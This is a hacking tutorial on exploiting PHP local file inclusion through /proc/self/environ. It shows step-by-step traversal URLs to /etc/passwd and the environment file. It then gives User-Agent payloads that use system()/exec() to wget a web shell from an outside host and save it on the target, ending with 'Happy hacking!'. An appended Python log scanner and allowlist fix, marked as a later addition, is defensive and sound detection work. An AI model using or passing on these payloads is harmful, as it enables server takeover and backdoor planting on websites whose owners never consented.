How to plant a shell through LFI (Local file disclosure) using the /proc/self/environ method
Writer: gunslinger_
In this tutorial I will explain how to create a shell on the target server through LFI using the /proc/self/environ method. OK, let's get straight to it ...
1. We find a website that is vulnerable to LFI.
example: http://site.com/info.php?file=news.php
2. Let's replace "news.php" with "../../../".
example: http://site.com/info.php?file=../../../
Then we get an error like the following:
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99
OK, it seems we have the opportunity to take advantage of the include to pull in another file. Next, we try to find /etc/passwd.
example: http://site.com/info.php?file=etc/passwd
But we still got an error like the following:
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99
What if we go up more directories? Let's try ...
example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoy, we managed to get the /etc/passwd file, and its contents are displayed on the page.
3. Let's check whether we can access /proc/self/environ. Now replace "/etc/passwd" with "/proc/self/environ".
example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
If you get something like this:
DOCUMENT_ROOT=/home/Gunslinger/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/Gunslinger/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=gunslinger@site.com
SERVER_NAME=www.site.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 OpenSSL/0.9.8k Server at www.site.com Port 80
Apparently we can access /proc/self/environ! If you get a blank page, /proc/self/environ cannot be accessed, or the operating system may be *BSD.
4. Now let's inject malicious code by poisoning an HTTP header. How can we inject it? We can use the Tamper Data add-on for Firefox. You can download it here: https://addons.mozilla.org/en-US/firefox/addon/966
Open Tamper Data in Firefox, then enter the /proc/self/environ URL from before, "http://site.com/info.php?file=../../../../../../../../../proc/self/environ", and fill in the User-Agent with the following code:
<? System ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
or
<? Exec ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
Then submit.
5. If we managed to inject the malicious code, the shell will be at a location like this:
http://site.com/shell.php
Happy hacking!
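A detection sketch for the request pattern in steps 3 and 4, added here as an example and not part of the original post: it scans Apache combined-format access log lines for traversal to /proc/self/environ (including nested percent-encoding) and for a PHP open tag in the User-Agent or Referer header. The log lines, IP addresses, header placeholder and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format; header fields may contain backslash-escaped quotes.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+)[^"]*" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
TRAVERSAL_RE = re.compile(r'\.\./.*proc/self/environ', re.I)

# Constructed sample lines (documentation IP ranges, placeholder header value).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2011:13:55:36 +0700] "GET /info.php?file=news.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/3.0.15"',
    '198.51.100.7 - - [10/Oct/2011:13:56:01 +0700] "GET /info.php?file=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1840 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2011:13:57:12 +0700] "GET /info.php?file=../../../proc/self/environ HTTP/1.1" 200 1902 "-" "<? /* constructed placeholder, no payload */ ?>"',
    '192.0.2.44 - - [10/Oct/2011:14:02:40 +0700] "GET /info.php?file=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 404 210 "-" "curl/7.19"',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%252F -> %2F -> /) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client_ip, findings) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = set()
    if TRAVERSAL_RE.search(fully_decode(m['uri'])):
        findings.add('environ-traversal')
    # A PHP open tag never belongs in a browser-supplied header.
    if any('<?' in m[field] for field in ('agent', 'referer')):
        findings.add('code-in-header')
    return m['ip'], findings

def scan(lines):
    """Group findings per client; both signals from one client is the full chain."""
    per_ip = {}
    for parsed in filter(None, map(classify, lines)):
        ip, findings = parsed
        if findings:
            per_ip.setdefault(ip, set()).update(findings)
    return {ip: ('high' if len(f) == 2 else 'medium', sorted(f)) for ip, f in per_ip.items()}

if __name__ == "__main__":
    for ip, (severity, findings) in scan(SAMPLE_LOG).items():
        print(ip, severity, findings)
```

Detection only shows that the chain was attempted; the fix is in info.php itself, where the file parameter should select from a fixed allowlist of page names instead of being passed to include().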